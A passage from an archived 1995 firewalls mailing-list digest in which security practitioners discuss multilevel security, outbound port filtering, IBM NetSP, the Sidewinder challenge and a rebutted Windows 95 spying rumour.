firewalls-outgoing; Tue, 1 Aug 1995 12:39:07 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11839 for ; Tue, 1 Aug 1995 12:38:53 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id sma011822; Tue Aug 1 12:38:29 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id MAA09643; Tue, 1 Aug 1995 12:32:56 -0700 Received: from unknown(199.86.32.7) by mycroft via smap (V1.3mjr) id sma009641; Tue Aug 1 12:32:35 1995 Received: from [199.86.33.19] by skypoint.com with smtp (Smail3.1.28.1 #6) id m0sdMnB-0001g6C; Tue, 1 Aug 95 14:15 CDT X-Sender: ray@skypoint.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 1 Aug 1995 14:18:22 -0500 To: Ted Doty From: kaplan@bpa.arizona.edu (Ray Kaplan) Subject: RE: Using miltilevel systems for firewalls Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ted Doty writes: >>So, I propose that anyone who is serious about mapping their infrastrucutre >>across a network (especially a public network like the Internet) needs to >>use multilevel systems - unless they only have one classification of data >>that they don't care about. I've never seen such an organization - anyone >>else? >Ignoring MLS requirements that the commercial world consider silly (e.g. >if you can't audit an event, shut down the device), this ignores the sad >state of getting a product evaluated. Until the process at the NCSC >changes substantially, it will continue to take companies 18 months to >three years to get products certified. Yep. And, with the various cut backs and noise from the commercial sector, it probably isn;t going to get any easier. >The result is that all certified products are obsolete. ;-) Perhaps, by definition. One interesting question is wheather or not this is necessary to reach the goal of a trusted system. Consider that the only way we seem to know how to end up with something (anything) that works is to build it according to our best ideas, deploy it, and hack on it until it works! Maybe it has to work this way to end up with something that can actually be trusted? >The European ITSEC seesm to be taking a much more corporate-friendly >approach to evaluations: companies hire organizations (CLEFs) that do the >evaluation, rather than relying on a (free but overworked - and therefore >slow) NCSC. Things seem to run much faster, with much lower risk for >the corporation and (therefore) lower cost to the customers who buy the >device. Yes indeed. I have always wondered about getting into the "commercial system evaluation" business with some sort of simpler scheme that would test against the client's requirements. The problem has always been the HUGE amount of $ reguired to equip a lab. The labs that I see my clients using to test their client / server stuff before they deploy then start in the neighborhood of $1megabuck and have a staff of 10 wizards from various disiplines, plus a giazillion consultants available for piece work. Anyone got about $10mil loose that they can seed this with? ;) RayK 8) - Better Living Through Authentication - I usually only speak for myself Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423 Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu But, as with everything else in life, this will change. From firewalls-owner Tue Aug 1 15:27:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11811 for firewalls-outgoing; Tue, 1 Aug 1995 12:38:02 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11755 for ; Tue, 1 Aug 1995 12:37:51 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id sma011727; Tue Aug 1 12:37:00 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id MAA09630; Tue, 1 Aug 1995 12:31:26 -0700 Received: from skypoint.com(199.86.32.7) by mycroft via smap (V1.3mjr) id sma009613; Tue Aug 1 12:30:56 1995 Received: from [199.86.33.19] by skypoint.com with smtp (Smail3.1.28.1 #6) id m0sdMmq-0001g2C; Tue, 1 Aug 95 14:15 CDT X-Sender: ray@skypoint.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 1 Aug 1995 14:18:01 -0500 To: firewalls@greatcircle.com From: kaplan@bpa.arizona.edu (Ray Kaplan) Subject: Re: multilevel security in firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Kate writes: >Regarding CMW tecnology for possible use as a firewall, we discussed this >in the lab at some length a while ago, and rejected the notion primarily >because CMWs require the X Window System and because they don't support >DNS. re: DNS Ummm, being in the middle of this darn OpenVMS / Digital UNIX / NT secuirty feature comparison that is plagueing me, I pulled the latest PR from DEC on their MLS+ CMW from ftp.dec.com. NOW, I wonder how IP can work at all - perhaps with a trusted DNS? Anyone know? Pending time to go get the real details (which are to be found in the Software Product Description (SPD) at ftp.dec.com), here is what I found: --Begin quote from DEC PR-- Digital Announces DEC MLS+ Release 3.1Digital Increases Lead in Enterprise Security Solutions AFCEA Conference, Washington, D.C. -- June 6, 1995 -- Digital Equipment Corporation today announced DEC MLS+ version 3.1, the latest release of its trusted UNIX(R) operating system. Based on Digital UNIX, the trusted operating system provides a B1 Compartmented Mode Workstation (CMW) secure windowing and network environment for Digital's family of 64-bit Alpha client, workstation, server, and network platforms. The fifth-generation trusted release underlines Digital's commitment to address the security requirements of the enterprise MIS community. DEC MLS+ 3.1 provides security enhancements to the Digital UNIX kernel, and includes security-enhanced versions of the industry standard OSF Motif V1.2.2 window manager and the X11 (R5) window server. Enhanced compatibility with mainstream Digital UNIX significantly increases the pallet of Commercial-Off-The-Shelf (COTS) applications available for Digital's Alpha secure environments. Built to enforce Bell-LaPadula mandatory access control - wherein users can neither read data that is above their authority level nor write data below their level - Digital's Multiple Level Secure - MLS product defines the state-of-the-art in enterprise security performance and usability. New features and functionality to version 3.1 include: support for trusted Network Information Services - NIS - full network security compliance to Trusted System Interoperability Group - TSIX (RE) 1.0, and configurable window security label display. Additionally, the fifth-generation product is based on Digital's current UNIX technology - a major contrast to competitors' less mature, second and third-generation security offerings, based on yesterday's first or second generation UNIX operating system offerings. NIS: Administration and Management Trusted NIS support provides the network administrator with an infrastructure to manage multiple trusted hosts across the network from a single host. DEC MLS+ 3.1 allows the administrator to set and reset security attributes for multiple network system hosts, from assigning accreditation ranges to dictating communications protocols. Furthermore, 3.1's NIS functionality allows the administrator to replicate individual and macro security changes across all nodes on the network. --End quote from DEC PR-- re: X on CMWs But, it is a trusted X - meaning that it was re-written to conform to the rules of CMW (which are a superset of B - some C and some A level features). I thought that the whole reason to have a CMW WAS to do X? RayK 8) - Better Living Through Authentication - I usually only speak for myself Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423 Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu But, as with everything else in life, this will change. From firewalls-owner Tue Aug 1 16:02:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18077 for firewalls-outgoing; Tue, 1 Aug 1995 15:15:28 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18051 for ; Tue, 1 Aug 1995 15:15:24 -0700 From: Aramanuj@ens.com Received: from radiomail.net(192.216.61.11) by miles via smap (V1.3) id sma018013; Tue Aug 1 15:14:48 1995 Received: from melonville.radiomail.net (mayberry.radiomail.net [192.216.61.8]) by radiomail.net (8.6.11/8.6.9) with SMTP id PAA03991 for ; Tue, 1 Aug 1995 15:13:47 -0700 Message-Id: <199508012213.PAA03991@radiomail.net> Received: from ens.com by melonville.radiomail.net with CCGW-1.7(930217); Tue, 01 Aug 95 14:47:39 PDT Date: 01 Aug 95 15:24 To: firewalls@greatcircle.com Subject: Firewall setup using SUN Netra i Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi folks, Has anyone set up a SUN Netra i as an internet server on a single port ethernet router (ex:CISCO 2501). What are the implications if we use packet filtering at the router level as well as netra internal security. Will this setup still be considered as a "single-point-of-comprimise/failure" ? ps we are on a novell netware 3.12 and due to get in to the (IN)secure world of INTERNET!! thanks in advance arathy ram From firewalls-owner Tue Aug 1 16:20:31 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18641 for firewalls-outgoing; Tue, 1 Aug 1995 15:24:49 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18590 for ; Tue, 1 Aug 1995 15:24:40 -0700 Received: from lykos.netpart.com(206.0.20.2) by miles via smap (V1.3) id sma018565; Tue Aug 1 15:23:45 1995 Received: (phil@localhost) by lykos.netpart.com (8.6.9/8.6.5) id PAA14824; Tue, 1 Aug 1995 15:22:58 -0700 Date: Tue, 1 Aug 1995 15:22:58 -0700 (PDT) From: Phil Trubey To: firewalls@greatcircle.com Subject: Microsoft SQL Server on NT through firewall? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know there has been some discussion here about Oracle's SQL*Net and how one would go about providing access to such a server through a firewall. Does anyone know if this is possible with Microsoft's SQL Server running on an NT machine? The Internet based client application will be using either dblib or ODBC calls to the network layer to access a server which will be on the protected side of the firewall. Does anyone know if MS SQL Server uses a static TCP port number for its server? Is any data including passwords encrypted? --- Phil Trubey | NetPartners | Providing Internet products and services. E-mail: phil@netpart.com | Home Page: http://www.netpart.com/ Phone: 619-622-8966 | From firewalls-owner Tue Aug 1 16:34:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA19188 for firewalls-outgoing; Tue, 1 Aug 1995 15:34:03 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA19121 for ; Tue, 1 Aug 1995 15:33:53 -0700 Received: from tera.bctel.net(204.174.66.253) by miles via smap (V1.3) id sma019106; Tue Aug 1 15:33:14 1995 Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id PAA07133; Tue, 1 Aug 1995 15:31:58 -0700 Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma007131; Tue Aug 1 15:31:51 1995 Received: (from murrell@localhost) by mocha.bctel.net (8.6.10/8.6.10) id PAA15835; Tue, 1 Aug 1995 15:29:38 -0700 Date: Tue, 1 Aug 1995 15:29:38 -0700 From: Brian Murrell Message-Id: <199508012229.PAA15835@mocha.bctel.net> To: darrell@teleport.com, sdw@lig.net Subject: Re: Port 139 (netbios over TCP) Cc: paul@rio.myra.com, firewalls@GreatCircle.COM X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > It's my current opinion that incoming ports should be blocked, but that > the outgoing connection is ok. Does anyone disagree? Hmmmm. Not only is the question debatable, but so is the answer. One could argue that limiting the outbound ports can help you detect trojans shipping sensitive data outside. Based on that, one could make a good argument for limiting outbound access by machines which have sensitive data on them. However, if I were going to create a trojan I would have a server on my machine on port 80 which was waiting for the trojan to ship data to it. To the firewall, it would look like web access. b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5262 From firewalls-owner Tue Aug 1 16:42:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA19051 for firewalls-outgoing; Tue, 1 Aug 1995 15:31:57 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA19004 for ; Tue, 1 Aug 1995 15:31:51 -0700 Received: from ian.aztec.co.za(196.3.251.162) by miles via smap (V1.3) id sma018989; Tue Aug 1 15:31:12 1995 Received: by ian.oms.co.za (Smail3.1.29.1 #4) id m0sdRhT-000MeDC; Wed, 2 Aug 95 00:30 GMT Message-Id: From: Ian Cooper Subject: Re: NetSp wins Trust Award To: firewalls@greatcircle.com Date: Wed, 2 Aug 1995 00:30:19 +0000 (GMT) In-Reply-To: <9508012027.AA4464@notes.mdor.state.mn.us> from "Eric Pederson" at Aug 1, 95 01:26:41 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 2092 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > The following information was forwarded to me by pro-IBM guy. I'd appreciate > comments from the list on both NetSP and the relavence of the announcement. > Oddly enough, there are at least two products within IBM that I am aware of that share the name NetSP - The NetSP Secured Logon Coordinator - The NetSP Secured Network Gateway The product referenced in the excerpt below is the former, while the firewall sometimes discussed on this list is the latter of the two. Accordingly, the announcement has no relevance whatsoever. > > -------- > SOMERS, N.Y., July 31, 1995--IBM's Resource Access Control Facility > (RACF) and NetSP Secured Logon Coordinator were recently named as > winners in two categories of the InfoSecurity News Readers' Trust > Awards. > > The magazine's readers selected NetSP as the best network security > product and RACF as the best platform security product in the awards > announced in the May/June issue. Readers were asked to choose which > product in each of 16 categories they trust the most. > > "These awards represent the opinions of information-security > professionals who use these products in real-life situations," said > Michael I. Sobol, InfoSecurity News publisher. "Our 28,000 readers > know more about the technology and the products than anyone. These are > the first awards to give the real experts in information security--our > readers--a chance to name their favorite products." > > -- Ian Cooper Internet: ian@oms.co.za Open Mind Solutions Tel: +27 083 253-9865 Open Systems and Network Specialists From firewalls-owner Tue Aug 1 17:00:31 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18844 for firewalls-outgoing; Tue, 1 Aug 1995 15:27:53 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18808 for ; Tue, 1 Aug 1995 15:27:47 -0700 Received: from ian.aztec.co.za(196.3.251.162) by miles via smap (V1.3) id sma018776; Tue Aug 1 15:27:33 1995 Received: by ian.oms.co.za (Smail3.1.29.1 #4) id m0sdRf6-000MeFC; Wed, 2 Aug 95 00:27 GMT Message-Id: From: Ian Cooper Subject: Re: NetSp wins Trust Award To: Eric_Pederson.RISD@notes.mdor.state.mn.us (Eric Pederson) Date: Wed, 2 Aug 1995 00:27:52 +0000 (GMT) Cc: firewalls@greatcircle.com In-Reply-To: <9508012027.AA4464@notes.mdor.state.mn.us> from "Eric Pederson" at Aug 1, 95 01:26:41 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 2101 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > The following information was forwarded to me by pro-IBM guy. I'd appreciate > comments from the list on both NetSP and the relavence of the announcement. > Oddly enough, there are at least two distinct products within IBM that I am aware of that share the name NetSP - The NetSP Secured Logon Coordinator - The NetSP Secured Network Gateway The product referenced in the excerpt below is the former, while the firewall sometimes discussed on this list is the latter of the two. Accordingly, the announcement has no relevance whatsoever. > > -------- > SOMERS, N.Y., July 31, 1995--IBM's Resource Access Control Facility > (RACF) and NetSP Secured Logon Coordinator were recently named as > winners in two categories of the InfoSecurity News Readers' Trust > Awards. > > The magazine's readers selected NetSP as the best network security > product and RACF as the best platform security product in the awards > announced in the May/June issue. Readers were asked to choose which > product in each of 16 categories they trust the most. > > "These awards represent the opinions of information-security > professionals who use these products in real-life situations," said > Michael I. Sobol, InfoSecurity News publisher. "Our 28,000 readers > know more about the technology and the products than anyone. These are > the first awards to give the real experts in information security--our > readers--a chance to name their favorite products." > > -- Ian Cooper Internet: ian@oms.co.za Open Mind Solutions Tel: +27 083 253-9865 Open Systems and Network Specialists From firewalls-owner Tue Aug 1 17:25:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18888 for firewalls-outgoing; Tue, 1 Aug 1995 15:28:53 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18877 for ; Tue, 1 Aug 1995 15:28:48 -0700 Received: from unknown(198.64.221.12) by miles via smap (V1.3) id sma018849; Tue Aug 1 15:28:42 1995 Received: from larry (nixon.merakusa.com [198.65.228.10]) by igate.merakusa.com (8.6.9/8.6.9) with SMTP id RAA26128; Tue, 1 Aug 1995 17:05:45 -0500 Message-Id: <199508012205.RAA26128@igate.merakusa.com> X-Sender: lsb@igate.merakusa.com X-Mailer: Windows Eudora Version 2.1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 01 Aug 1995 17:28:14 -0600 To: sjs@sunthing.sjsinc.com (Stefan Jon Silverman) From: Larry Barras Subject: Re: Huge gapping hole in Win95 Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Subject: Windows 95 Warning on comp.risks [RISKS-17.13], in Information Week > >Microsoft officials confirm that beta versions of Windows 95 include a small >viral routine called Registration Wizard. It interrogates every system on a >network gathering intelligence on what software is being run on which >machine. This is old FUD. Like most fud, it's based on a mis-perception of the truth. The online registration program asks if you want to include information on your hardware and software along with registering your W95 upgrade. It shows you what it is collecting and sending. The information is the same stuff you can fill in on a registration postcard. It just automates the process. I personally click no, and leave post cards blank, thank you very much. > - "*user*" fires up MS-Network which then transmits the > entire corporate filesystem topology to MicroSoft. > > - security types never know that internal information has > been severely compromised. No, it won't happen. Think about it. Even if it were true, how long would it take for a single PC to navigate and discover your entire corporate file system? How long would it take to transmit that info by 14.4 or 28.8 modem? More than a second or two, I would suspect. > 3). Am I wrong here??? I find the potential for this scenario > both realistic and horrifying!!!! Congratulations. You've been successfully fuddified. [not Stefan's comment, snipped from usenet post] >So spread the word as far and wide as possible: Steer clear of Windows 95. = Plenty of reasons to do this that are based on the truth, not nonsense. I personally choose Macintosh for my own computing. (this is a whole 'nother animal, and yeah I feel wierd being on Microsoft's side.) Windows 95 presents a significantly *improved* security profile over DOS/Windows. Since practically everyone has to deal with offices littered with Wintel boxes, I'd think even a minimal security system would be a welcome relief. >Subject: Windows 95 Warning on comp.risks [RISKS-17.13], in Information Week > >Microsoft officials confirm that beta versions of Windows 95 include a small >viral routine called Registration Wizard. It interrogates every system on a >network gathering intelligence on what software is being run on which >machine. At 11:33 AM 8/1/95 -0700, Stefan Jon Silverman wrote: >Folks: > > 1). Please see the posting below my sig line from comp.risks > > 2). I can imagine the following scenario: > > - "*user*" thrilled with his new upgrade to Win95 runs out > to Fry's, Egghead...and buys a modem unbeknownst to the > security types. > > - computer is also running a TCP/IP stack and PCNFS to > access all of the corporate resources behind the firewall. > > - "*user*" fires up MS-Network which then transmits the > entire corporate filesystem topology to MicroSoft. > > - security types never know that internal information has > been severely compromised. > > 3). Am I wrong here??? I find the potential for this scenario > both realistic and horrifying!!!! > > 4). In addition to the security implications, this might actually > be a way to tame the MS beast...if enough corporations get > probbed in this manner, the lawyers will have lots of fun > putting together a class-action lawsuit to make MS (the > original home of proprietary information and disclosures) > much, much poorer for stealing tradesecrets, copyrights, > etc....ALAS...I love it.... > > 5). I think this also has implications for the MS TCP/IP port > discussion that has been going on on this list recently. > I.e., as the article points out, if they have your filesystem > structure and you are not blocking that port, they could > grab any file that they want and you would never know it... > > Regards, > > b c++'ing u, > > %-) sjs > >------------------------------------------------------------------------------- >Stefan Jon Silverman - President SJS Associates, N.A., Inc. > 572 Chestnut Street >Distributed Systems Architecture & Implementation San Francisco, Ca. 94133 > Phone: 415 989 2741 >E-mail: sjs@sjsinc.com Cell: 415 519 3494 >------------------------------------------------------------------------------- > Weebles wobble, but they don't fall down!!! >------------------------------------------------------------------------------- > >Date: 30 Jun 1995 07:47:48 U >From: "Paul Saffo" >Subject: Warning on Using Win95 > >>From PLS_MCI_MAIL FWD>>Warning on Using Win95 > >Date: 6/26/95 8:44 PM >From: jbreyer@accel.com >Subject: Warning on Using Win95 [Update on RISKS-17.13 item] > >Believe it or not, this is not Net humor but serious. It would otherwise >be outstanding satire! > >Subject: Windows 95 Warning on comp.risks [RISKS-17.13], in Information Week > >Microsoft officials confirm that beta versions of Windows 95 include a small >viral routine called Registration Wizard. It interrogates every system on a >network gathering intelligence on what software is being run on which >machine. It then creates a complete listing of both Microsoft's and >competitors' products by machine, which it reports to Microsoft when >customers sign up for Microsoft's Network Services, due for launch later >this year. > >"In Short" column, page 88, _Information Week_ magazine, May 22,1995 The >implications of this action, and the attitude of Microsoft to plan such >action, beggars the imagination. > >An update on this. A friend of mine got hold of the beta test CD of Win95, >and set up a packet sniffer between his serial port and the modem. When you >try out the free demo time on The Microsoft Network, it transmits your >entire directory structure in background. > >This means that they have a list of every directory (and, potentially every >file) on your machine. It would not be difficult to have something like a >FileRequest from your system to theirs, without you knowing about it. This >way they could get ahold of any juicy routines you've written yourself and >claim them as their own if you don't have them copyrighted. > >Needless to say, I'm rather annoyed about this. >So spread the word as far and wide as possible: Steer clear of Windows 95. = > >There's nothing to say that this "feature" will be removed in the final >release. > > [GML addition: Prodigy was accused of doing something similar several > years ago. In that case it was not nearly as threatening due to: 1) it > was = limited to a single PC, 2) Prodigy couldn't do much with the info > (i.e. they could not pursue you for copyright infringement, nor were they > trying to expand into so many businesses the way Microsoft is).] > > Larry Barras Merak Projects, Inc. From firewalls-owner Tue Aug 1 17:30:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA19214 for firewalls-outgoing; Tue, 1 Aug 1995 15:34:59 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA19196 for ; Tue, 1 Aug 1995 15:34:55 -0700 Received: from beach.sctc.com(192.55.214.50) by miles via smap (V1.3) id sma019189; Tue Aug 1 15:34:11 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id RAA00777 for ; Tue, 1 Aug 1995 17:36:54 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id RAA00773 for ; Tue, 1 Aug 1995 17:36:54 -0500 Received: from ender.sctc.com (ender.sctc.com [172.17.192.69]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id RAA00423 for ; Tue, 1 Aug 1995 17:22:25 -0500 Received: (from thomsen@localhost) by ender.sctc.com (8.6.12/8.6.9) id RAA05070; Tue, 1 Aug 1995 17:22:23 -0500 Date: Tue, 1 Aug 1995 17:22:23 -0500 From: dan thomsen Message-Id: <199508012222.RAA05070@ender.sctc.com> To: firewalls@greatcircle.com Subject: Sidewinder Challenge Sender: firewalls-owner@GreatCircle.COM Precedence: bulk For the record The reward for completing the Sidewinder Challenge has not changed! Someone erroneously posted a message saying that the reward for completing the challenge at DEFCON was $5000. The reward still remains a black nylon flight jacket with the Sidewinder logo on it. In response to some of the discussion this has generated I thought I would answer a few of the concerns that have been raised. CONCERN 1. Setting up a challenge site does not provide sufficient testing, All a challenge site does is test how good the attackers are. We do NOT test the Sidewinder system by setting up a challenge site. We have a Systems test group that does systems testing. They work independently from the developers to test the functionality and security of the system. CONCERN 2. What good is the challenge, because it is not set up like a firewall. [Note, for those not familiar with the Sidewinder challenge, we let you login to the Challenge system and from there you have to get to a machine on the internal network. The DEFCON challenge is going to be more difficult and set up more like a firewall] The Secure Computing Sidewinder challenge focuses on testing the type enforcement technology, not the firewall capability. Type enforcement is what we use to protect sensitive data, applications, and network interfaces in the firewall product. Why do we focus on type enforcement? First off we want people to look at the system. If it was set up like a firewall only the successful people see inside the system. A firewall challenge is more difficult and attackers would lose interest quickly. Believe it or not we wanted to give the hackers a chance to break into the system. The standard Sidewinder firewall product was modified to produce a Sidewinder challenge system that gives the hackers three key advantages: - A login account on the firewall (demo with no password) Normally users do not have accounts on Sidewinder. - Four access violations before they are logged out On the Sidewinder firewall one violation causes a user to be logged out. - Loose Unix administration Rather than remove every piece of software on the system and tighten security so hackers have nothing to work with, we left many Unix programs on the challenge system, including a compiler. On the Sidewinder firewall programs that are not needed are removed. People can get inside the challenge system and look around. We have had approximately 10 people get 'root' access. Since type enforcement is underneath the Unix permissions it doesn't do them any good. The attacker is still constrained by the underlying type enforcement constraints. As a result we get to learn what kind of attacks people are using against Unix systems. More importantly this shows that type enforcement is a useful tool in preventing system compromises. The biggest reason to create a challenge site that is different from the Sidewinder firewall product is to protect our customers. If there ever was a successful attack found on the Sidewinder challenge site it could not be used directly on the Sidewinder firewall. The challenge site is currently based on a pre 1.0 release of Sidewinder. Currently we are shipping 2.0 systems, and upgrading all our customers to 2.0 systems. We monitor the challenge site everyday and if someone finds a vulnerability we can respond immediately by closing the vulnerability and notifying all our customers. The DEFCON firewall challenge is more difficult than the Sidewinder Challenge. While it looks more like the the Sidewinder firewall product we are only running the DEFCON challenge for a short period time, and it will be closely monitored. CONCERN 3. Is the Challenge a serious learning tool or a Marketing tactic? The answer is both. We learn about attacks on Unix operating system. People who login to the challenge site learn about type enforcement. If you are considering buying a firewall system what better way to evaluate it than to login and kick the virtual tires. Dan Thomsen Secure Computing thomsen@sctc.com From firewalls-owner Tue Aug 1 17:59:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA24463 for firewalls-outgoing; Tue, 1 Aug 1995 16:55:25 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA24411 for ; Tue, 1 Aug 1995 16:55:18 -0700 Received: from utrecht.knoware.nl(193.78.120.3) by miles via smap (V1.3) id sma024355; Tue Aug 1 16:54:21 1995 Received: from csehost.idiscover.co.uk (csehost.idiscover.co.uk [194.128.134.177]) by utrecht.knoware.nl (8.6.12/8.6.12) with SMTP id BAA06049; Wed, 2 Aug 1995 01:50:28 +0200 Date: Wed, 2 Aug 1995 01:50:28 +0200 Message-Id: <199508012350.BAA06049@utrecht.knoware.nl> X-Sender: njb@pop.knoware.nl Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) From: njb@knoware.nl (Niels Bjergstrom) Subject: Re: Multilevel systems Cc: firewalls@greatcircle.com X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Padgett writes: >Our problem today is that suddently we have put finance and engineering and >executives and *everybody* into one big pot called "Enterprise". Yes, this generates a series of security and management problems: Migration of data that should not migrate, lack of knowledge of what a corporation actually owns, etc. Charting areas or subnets with different risk structures is one of the first and often challenging (and rewarding) tasks when attempting to bring networks growing wild, under control. >Trouble is that firewalls are a good answer to the outside threat but a >*lousy* one for the inside problem. Multilevel separation is an inside >answer but the firewall is not a good place to apply it. > >Instead the finance department needs its own simple firewall between it and >the rest of the enterprise. Please explain these seemingly contradictory statements. What is the difference between THE firewall and A firewall? I find it difficult to see any great conceptual difference between the protection (firewall) you install to separate parts of a WAN and the protection (firewall) you install to separate LANs. In fact, as the problems you touch upon really starts to dawn on management types I suspect that we shall be installing more firewalls between intra-organisational subnets than between internal nets and the Internet. >Not single point multilevel but distributed bilevel. While it is probably correct that a single-point multilevel solution is only a viable solution in simple cases (e.g. enforced by a three-NIC router connected to the Internet to one side, to the campus network to the second, and to the university administrative network to the third), multi-point multilevel solutions (or security step solutions, whatever we should call them) seem to me to be a reasonable solution in cases where you have a number of domains interconnected, each having different security requirements. Just like anti-virus protection: On most networks the behaviour-blockers installed on all the PC type workstations constitute an extremely good perimeter defence; however inside extra-secure subnets you prevent unauthorised (standard) diskettes from being accessible, thus forcing all software on diskettes to pass through a virus-scanning gateway (which we call a "sheep-dip computer") that encrypts track zero on approved diskettes from the outside, thus authorising them, and decrypts track zero on diskettes from the inside to be used on outside computers, after having certified that the informaton transported on the diskette is actually allowed to be carried out of the organisation. Same principle applies to magnetic media carried into the building by contractors, salespersons, etc. Thus I think your "multi" is the way to go, whereas I don't agree with your "bi" :-). Rgds, Niels From firewalls-owner Tue Aug 1 18:01:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA28127 for firewalls-outgoing; Tue, 1 Aug 1995 17:44:05 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA28074 for ; Tue, 1 Aug 1995 17:43:55 -0700 Received: from lig.cinti.net(204.248.145.100) by miles via smap (V1.3) id sma028023; Tue Aug 1 17:43:35 1995 Received: by sdwsys (Linux Smail3.1.28.1 #20) id m0sdRsw-0009ywC; Tue, 1 Aug 95 20:42 EDT Message-Id: From: sdw@lig.net (Stephen D. Williams) Subject: Re: Port 139 (netbios over TCP) To: murrell@bctel.net (Brian Murrell) Date: Tue, 1 Aug 1995 20:42:09 -0400 (EDT) Cc: darrell@teleport.com, sdw@lig.net, paul@rio.myra.com, firewalls@GreatCircle.COM In-Reply-To: <199508012229.PAA15835@mocha.bctel.net> from "Brian Murrell" at Aug 1, 95 03:29:38 pm X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1445 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > > It's my current opinion that incoming ports should be blocked, but that > > the outgoing connection is ok. Does anyone disagree? > > Hmmmm. Not only is the question debatable, but so is the answer. One could > argue that limiting the outbound ports can help you detect trojans shipping > sensitive data outside. Based on that, one could make a good argument for > limiting outbound access by machines which have sensitive data on them. > > However, if I were going to create a trojan I would have a server on my > machine on port 80 which was waiting for the trojan to ship data to it. To > the firewall, it would look like web access. I'd uuencode it and send it to every smtp port I could connect to addressed to a string of anon-server addresses... So, besides trojans trying to get out, what other problems can we find? > b. > > Brian J. Murrell murrell@bctel.net > BCTel Advanced Communications brian@ilinx.com > Vancouver, B.C. brian@wimsey.com > 604 454 5262 sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From firewalls-owner Tue Aug 1 18:30:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA00589 for firewalls-outgoing; Tue, 1 Aug 1995 18:05:36 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA00355 for ; Tue, 1 Aug 1995 18:05:02 -0700 Received: from foobar.ipsilon.com(204.160.241.205) by miles via smap (V1.3) id sma000317; Tue Aug 1 18:04:19 1995 Received: from localhost.ipsilon.com 